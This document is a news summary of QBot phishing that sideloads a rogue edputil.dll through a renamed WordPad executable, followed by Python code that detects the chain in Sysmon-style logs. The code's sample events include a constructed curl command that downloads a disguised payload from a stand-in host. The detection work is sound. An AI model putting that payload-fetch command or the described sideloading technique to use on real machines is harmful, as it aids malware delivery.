BleepingComputer reports that recent phishing attacks by the QBot malware operation, also known as Qakbot, have involved the exploitation of a DLL hijacking flaw in the Windows 10 WordPad executable "write.exe."
According to Cryptolaemus member and security researcher ProxyLife, the phishing emails sent by the operation contain a link that downloads a randomly named ZIP archive. The archive holds the WordPad executable, renamed "document.exe", together with an "edputil.dll" file used for the DLL hijack. Launching "document.exe" makes WordPad try to load the legitimate "edputil.dll", but any DLL of the same name placed alongside it is loaded instead, which is what enables the hijacking. Once a further DLL disguised as a PNG file has been downloaded, QBot goes on to exfiltrate emails and deploy additional payloads.
While installing QBot through the Windows 10 WordPad executable helps it evade detection by security software, the attack relies on curl.exe and therefore only works on machines running Windows 10 and later, said ProxyLife.
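As an added example (not from the BleepingComputer report or ProxyLife's analysis), the following Python flags the two observable steps of the chain described above in Sysmon-style telemetry: "edputil.dll" loaded from outside the system directories by a process whose PE original file name is WRITE.EXE, and curl.exe spawned by that same process. The event records, user name, paths and URL are constructed; the field names follow Sysmon Event ID 7 (image loaded) and Event ID 1 (process created).

```python
"""Flag the renamed-WordPad / edputil.dll sideload chain in Sysmon-style telemetry."""
import ntpath

# Directories from which WordPad is expected to load the genuine edputil.dll.
TRUSTED_DLL_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Constructed sample records shaped like Sysmon Event ID 7 (Image loaded) and
# Event ID 1 (Process created). User name, folder names and URL are made up.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Windows\System32\write.exe", "OriginalFileName": "WRITE.EXE",
     "ImageLoaded": r"C:\Windows\System32\edputil.dll"},                      # benign load
    {"EventID": 7, "Image": r"C:\Users\alice\Downloads\a8f2\document.exe",
     "OriginalFileName": "WRITE.EXE",
     "ImageLoaded": r"C:\Users\alice\Downloads\a8f2\edputil.dll"},            # hijacked load
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Users\alice\Downloads\a8f2\document.exe",
     "CommandLine": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\pic.png http://example.invalid/pic.png"},
]


def detect(events):
    """Return findings for edputil.dll loaded outside the system directories and
    for curl.exe spawned by a process that did so. Events are assumed chronological."""
    findings = []
    sideloaders = {}  # lower-cased image path -> whether it looks like a renamed write.exe
    for ev in events:
        if ev["EventID"] == 7:
            dll = ev["ImageLoaded"]
            if ntpath.basename(dll).lower() != "edputil.dll":
                continue
            if ntpath.dirname(dll).lower() in TRUSTED_DLL_DIRS:
                continue  # genuine DLL from a system directory
            host = ev["Image"]
            # The lure ships WordPad renamed to document.exe; the PE header's
            # OriginalFileName still reads WRITE.EXE, which exposes the rename.
            renamed = (ev.get("OriginalFileName", "").lower() == "write.exe"
                       and ntpath.basename(host).lower() != "write.exe")
            sideloaders[host.lower()] = renamed
            findings.append({"rule": "edputil_sideload", "process": host,
                             "detail": dll, "renamed_wordpad": renamed})
        elif ev["EventID"] == 1:
            parent = ev.get("ParentImage", "").lower()
            if ntpath.basename(ev["Image"]).lower() == "curl.exe" and parent in sideloaders:
                findings.append({"rule": "curl_from_sideloaded_wordpad",
                                 "process": ev["ParentImage"],
                                 "detail": ev.get("CommandLine", ""),
                                 "renamed_wordpad": sideloaders[parent]})
    return findings
```

A curl.exe launch on its own is not flagged; it only becomes a finding when its parent has already loaded a rogue edputil.dll, which keeps ordinary scripted curl use out of the alert queue.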